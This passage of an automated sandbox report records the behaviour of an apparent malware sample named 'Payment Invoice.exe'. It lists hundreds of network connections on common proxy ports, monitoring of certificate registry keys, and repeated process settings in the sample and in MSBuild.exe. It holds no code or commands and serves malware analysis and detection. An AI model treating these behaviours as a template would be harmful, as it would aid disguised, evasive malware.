                Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 24787
                Source: unknownNetwork traffic detected: HTTP traffic on port 13477 -> 50209
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50360
                Source: unknownNetwork traffic detected: HTTP traffic on port 999 -> 49802
                Source: unknownNetwork traffic detected: HTTP traffic on port 51185 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50843 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51137 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 36694
                Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 34144
                Source: unknownNetwork traffic detected: HTTP traffic on port 50199 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51190 -> 22942
                Source: unknownNetwork traffic detected: HTTP traffic on port 51146 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50840 -> 2233
                Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 40536
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 24183
                Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 42624
                Source: unknownNetwork traffic detected: HTTP traffic on port 51161 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50564 -> 15864
                Source: unknownNetwork traffic detected: HTTP traffic on port 51194 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 58703 -> 51030
                Source: unknownNetwork traffic detected: HTTP traffic on port 24397 -> 50565
                Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 7302
                Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 18877
                Source: unknownNetwork traffic detected: HTTP traffic on port 9990 -> 50187
                Source: unknownNetwork traffic detected: HTTP traffic on port 50708 -> 52858
                Source: unknownNetwork traffic detected: HTTP traffic on port 1337 -> 50205
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51113
                Source: unknownNetwork traffic detected: HTTP traffic on port 50684 -> 8182
                Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 51027
                Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 50051
                Source: unknownNetwork traffic detected: HTTP traffic on port 5529 -> 50590
                Source: unknownNetwork traffic detected: HTTP traffic on port 50287 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50987 -> 58714
                Source: unknownNetwork traffic detected: HTTP traffic on port 50295 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50984 -> 34411
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51108
                Source: unknownNetwork traffic detected: HTTP traffic on port 50930 -> 57144
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 51146
                Source: unknownNetwork traffic detected: HTTP traffic on port 51165 -> 54917
                Source: unknownNetwork traffic detected: HTTP traffic on port 7117 -> 50791
                Source: unknownNetwork traffic detected: HTTP traffic on port 51197 -> 31679
                Source: unknownNetwork traffic detected: HTTP traffic on port 51186 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51167 -> 8880
                Source: unknownNetwork traffic detected: HTTP traffic on port 51207 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51181 -> 29985
                Source: unknownNetwork traffic detected: HTTP traffic on port 50328 -> 22500
                Source: unknownNetwork traffic detected: HTTP traffic on port 51233 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51218 -> 5935
                Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51192 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50402 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50258 -> 49865
                Source: unknownNetwork traffic detected: HTTP traffic on port 51191 -> 8083
                Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 3129
                Source: unknownNetwork traffic detected: HTTP traffic on port 51230 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51235 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51205 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 51216 -> 18080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50385 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 51257 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50467 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51246 -> 5430
                Source: unknownNetwork traffic detected: HTTP traffic on port 51283 -> 5432
                Source: unknownNetwork traffic detected: HTTP traffic on port 51274 -> 30717
                Source: unknownNetwork traffic detected: HTTP traffic on port 51277 -> 29813
                Source: unknownNetwork traffic detected: HTTP traffic on port 50612 -> 51507
                Source: unknownNetwork traffic detected: HTTP traffic on port 51016 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 34144
                Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 12792
                Source: unknownNetwork traffic detected: HTTP traffic on port 51263 -> 36181
                Source: unknownNetwork traffic detected: HTTP traffic on port 50518 -> 9090
                Source: unknownNetwork traffic detected: HTTP traffic on port 50631 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 50761 -> 19770
                Source: unknownNetwork traffic detected: HTTP traffic on port 50773 -> 4228
                Source: unknownNetwork traffic detected: HTTP traffic on port 50738 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 36694
                Source: unknownNetwork traffic detected: HTTP traffic on port 50722 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51358 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50741 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51380 -> 31147
                Source: unknownNetwork traffic detected: HTTP traffic on port 50632 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50337 -> 32824
                Source: unknownNetwork traffic detected: HTTP traffic on port 51042 -> 1951
                Source: unknownNetwork traffic detected: HTTP traffic on port 50707 -> 4444
                Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 34411
                Source: unknownNetwork traffic detected: HTTP traffic on port 50676 -> 40571
                Source: unknownNetwork traffic detected: HTTP traffic on port 51395 -> 44523
                Source: unknownNetwork traffic detected: HTTP traffic on port 10513 -> 51155
                Source: unknownNetwork traffic detected: HTTP traffic on port 51328 -> 3389
                Source: unknownNetwork traffic detected: HTTP traffic on port 51373 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 51039 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 51283
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50843
                Source: unknownNetwork traffic detected: HTTP traffic on port 50807 -> 56581
                Source: unknownNetwork traffic detected: HTTP traffic on port 51438 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50822 -> 28513
                Source: unknownNetwork traffic detected: HTTP traffic on port 51390 -> 19925
                Source: unknownNetwork traffic detected: HTTP traffic on port 50899 -> 58851
                Source: unknownNetwork traffic detected: HTTP traffic on port 51336 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51436 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50963 -> 9000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51433 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51427 -> 10010
                Source: unknownNetwork traffic detected: HTTP traffic on port 4228 -> 50773
                Source: unknownNetwork traffic detected: HTTP traffic on port 50840 -> 2233
                Source: unknownNetwork traffic detected: HTTP traffic on port 51439 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51445 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51449 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51005 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51358
                Source: unknownNetwork traffic detected: HTTP traffic on port 51452 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51069 -> 39782
                Source: unknownNetwork traffic detected: HTTP traffic on port 51483 -> 5432
                Source: unknownNetwork traffic detected: HTTP traffic on port 51432 -> 7891
                Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 999 -> 50650
                Source: unknownNetwork traffic detected: HTTP traffic on port 51467 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51472 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51441 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51461 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 51434 -> 5000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51455 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51419 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51446 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51538 -> 5050
                Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 57391
                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 51918
                Source: unknownNetwork traffic detected: HTTP traffic on port 51437 -> 8800
                Source: unknownNetwork traffic detected: HTTP traffic on port 20001 -> 50956
                Source: unknownNetwork traffic detected: HTTP traffic on port 51464 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51462 -> 8880
                Source: unknownNetwork traffic detected: HTTP traffic on port 51545 -> 3051
                Source: unknownNetwork traffic detected: HTTP traffic on port 51059 -> 27391
                Source: unknownNetwork traffic detected: HTTP traffic on port 51547 -> 4595
                Source: unknownNetwork traffic detected: HTTP traffic on port 51465 -> 8083
                Source: unknownNetwork traffic detected: HTTP traffic on port 51458 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51496 -> 21861
                Source: unknownNetwork traffic detected: HTTP traffic on port 51507 -> 10000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51501 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51551 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51435 -> 58386
                Source: unknownNetwork traffic detected: HTTP traffic on port 51578 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 34144
                Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 51483
                Source: unknownNetwork traffic detected: HTTP traffic on port 51550 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51098 -> 49202
                Source: unknownNetwork traffic detected: HTTP traffic on port 51568 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51535 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51575 -> 31679
                Source: unknownNetwork traffic detected: HTTP traffic on port 51174 -> 15410
                Source: unknownNetwork traffic detected: HTTP traffic on port 51534 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51580 -> 64935
                Source: unknownNetwork traffic detected: HTTP traffic on port 10010 -> 51427
                Source: unknownNetwork traffic detected: HTTP traffic on port 50315 -> 82
                Source: unknownNetwork traffic detected: HTTP traffic on port 51165 -> 54917
                Source: unknownNetwork traffic detected: HTTP traffic on port 51189 -> 666
                Source: unknownNetwork traffic detected: HTTP traffic on port 51565 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51612 -> 1403
                Source: unknownNetwork traffic detected: HTTP traffic on port 51260 -> 31908
                Source: unknownNetwork traffic detected: HTTP traffic on port 51516 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51557 -> 38832
                Source: unknownNetwork traffic detected: HTTP traffic on port 51675 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 51116 -> 6008
                Source: unknownNetwork traffic detected: HTTP traffic on port 51196 -> 62969
                Source: unknownNetwork traffic detected: HTTP traffic on port 51582 -> 5430
                Source: unknownNetwork traffic detected: HTTP traffic on port 51598 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51614 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51782 -> 14738
                Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 14921
                Source: unknownNetwork traffic detected: HTTP traffic on port 51684 -> 1087
                Source: unknownNetwork traffic detected: HTTP traffic on port 51605 -> 29985
                Source: unknownNetwork traffic detected: HTTP traffic on port 51179 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 51613 -> 18080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51615 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51742 -> 21011
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 51336
                Source: unknownNetwork traffic detected: HTTP traffic on port 51160 -> 31247
                Source: unknownNetwork traffic detected: HTTP traffic on port 51669 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51799 -> 6705
                Source: unknownNetwork traffic detected: HTTP traffic on port 51739 -> 9000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51810 -> 13175
                Source: unknownNetwork traffic detected: HTTP traffic on port 51618 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 51648 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 40536
                Source: unknownNetwork traffic detected: HTTP traffic on port 10000 -> 51507
                Source: unknownNetwork traffic detected: HTTP traffic on port 51686 -> 10007
                Source: unknownNetwork traffic detected: HTTP traffic on port 51588 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50987 -> 58714
                Source: unknownNetwork traffic detected: HTTP traffic on port 51682 -> 27029
                Source: unknownNetwork traffic detected: HTTP traffic on port 51917 -> 30026
                Source: unknownNetwork traffic detected: HTTP traffic on port 51866 -> 53149
                Source: unknownNetwork traffic detected: HTTP traffic on port 51836 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51380 -> 31147
                Source: unknownNetwork traffic detected: HTTP traffic on port 51395 -> 44523
                Source: unknownNetwork traffic detected: HTTP traffic on port 51438 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51205 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 36694
                Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 42624
                Source: unknownNetwork traffic detected: HTTP traffic on port 50984 -> 34411
                Source: unknownNetwork traffic detected: HTTP traffic on port 51840 -> 2411
                Source: unknownNetwork traffic detected: HTTP traffic on port 51862 -> 58037
                Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 51419
                Source: unknownNetwork traffic detected: HTTP traffic on port 51169 -> 7302
                Source: unknownNetwork traffic detected: HTTP traffic on port 51608 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51730 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51870 -> 9827
                Source: unknownNetwork traffic detected: HTTP traffic on port 51827 -> 44444
                Source: unknownNetwork traffic detected: HTTP traffic on port 51875 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 51789 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51688 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51712 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 51938 -> 31733
                Source: unknownNetwork traffic detected: HTTP traffic on port 51868 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51251 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51887 -> 4145
                Source: C:\Users\user\Desktop\Payment Invoice.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
